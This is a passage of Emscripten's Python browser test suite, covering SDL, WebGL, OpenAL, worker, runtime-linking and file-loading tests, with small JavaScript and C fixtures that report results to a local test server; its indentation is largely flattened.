shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
@no_wasm_backend('dynamic linking')
def test_runtimelink(self):
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
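    # With WASM=0 and a separate memory init file, static memory arrives asynchronously;
    # writing to it from post.js before it arrives is caught under ASSERTIONS (reports 9),
    # and is silently overwritten otherwise (reports 3).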
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
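    # Supply Module.memoryInitializerRequest ourselves from pre.js: a valid .mem URL should
    # load normally, while a bogus URL should hit the warning path and report 0.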
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
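    # Calling ccall/cwrap/direct exports before the runtime is ready should abort (under ASSERTIONS);
    # once the runtime is up (or kept alive via postRun), the same calls succeed.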
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
        ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
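    # build the worker side first (BUILD_AS_WORKER=1), then the main page that drives it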
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
@no_wasm_backend('emterpretify')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
@no_wasm_backend('dynamic linking')
def test_preload_module(self):
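    # Build a side module, rename it to .so, preload the whole directory, and verify that
    # dlopen() finds the already-compiled module in Module['preloadedWasm'].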
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
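    # mmap a file that arrives via --preload-file, with and without --no-heap-copy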
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
      # If EMTEST_BROWSER carried command line arguments to pass to the browser
      # (e.g. "firefox -profile /path/to/foo"), those can't be passed via emrun,
      # so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--no_private_browsing']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
  # This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
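    # adding and immediately removing a run dependency in preRun must not make the runtime start twice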
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@no_chrome('see #7930')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0', timeout=20)
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0', timeout=20)
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
  # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas when it has no ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [
[],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
  # Tests that glVertexAttribPointer with packed types works together with -s GL_ASSERTIONS=1
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
@no_wasm_backend('emterpretify')
def test_wget(self):
with open('test.txt', 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
@no_wasm_backend('emterpretify')
def test_wget_data(self):
with open('test.txt', 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
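    # Module.locateFile redirects runtime file requests (.data/.mem/.wasm) to another directory;
    # test it both from a pre.js and from the shell HTML.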
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
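    # Build a second asm.js module with the same options and hot-swap it in at runtime via
    # SWAPPABLE_ASM_MODULE; run.js checks the result before and after the swap.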
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
